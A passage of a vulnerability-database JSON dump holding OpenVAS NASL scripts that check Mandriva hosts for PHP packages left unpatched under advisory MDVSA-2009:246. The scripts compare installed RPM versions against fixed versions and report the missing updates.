rpm:\"php-ncurses~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sybase\", rpm:\"php-sybase~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sybase\", rpm:\"php-sybase~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3292", "CVE-2008-7068", "CVE-2009-3291", "CVE-2009-3293"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:246.", "modified": "2018-04-06T00:00:00", "published": "2009-09-28T00:00:00", "id": "OPENVAS:136141256231064958", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064958", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:246 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_246.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:246 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities was discovered and corrected in php:\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key with\nthe NULL byte. NOTE: this might only be a vulnerability in limited\ncircumstances in which the attacker can modify or add database entries\nbut does not have permissions to truncate the file (CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact\nand attack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in\nPHP before 5.2.11 has unknown impact and attack vectors related to\nan incorrect sanity check for the color index. (CVE-2009-3293)\n\nThis update provides a solution to these vulnerabilities.\n\nAffected: Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:246\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:246.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64958\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-28 19:09:13 +0200 (Mon, 28 Sep 2009)\");\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:246 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libphp_common432\", rpm:\"libphp_common432~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php432-devel\", rpm:\"php432-devel~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba_bundle\", rpm:\"php-dba_bundle~4.3.4~1.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.4~1.8.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php_common432\", rpm:\"lib64php_common432~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp4_common4\", rpm:\"libphp4_common4~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-cgi\", rpm:\"php4-cgi~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-cli\", rpm:\"php4-cli~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-dba_bundle\", rpm:\"php4-dba_bundle~4.4.4~1.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-devel\", rpm:\"php4-devel~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-exif\", rpm:\"php4-exif~4.4.4~1.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~1.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.1.6~1.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~1.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php4_common4\", rpm:\"lib64php4_common4~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp_common432\", rpm:\"libphp_common432~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php432-devel\", rpm:\"php432-devel~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.4~1.8.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3292", "CVE-2008-7068", "CVE-2009-3291", "CVE-2009-3293"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:246.", "modified": "2017-07-07T00:00:00", "published": "2009-09-28T00:00:00", "id": "OPENVAS:64958", "href": "http://plugins.openvas.org/nasl.php?oid=64958", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:246 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_246.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:246 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities was discovered and corrected in php:\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key with\nthe NULL byte. NOTE: this might only be a vulnerability in limited\ncircumstances in which the attacker can modify or add database entries\nbut does not have permissions to truncate the file (CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate 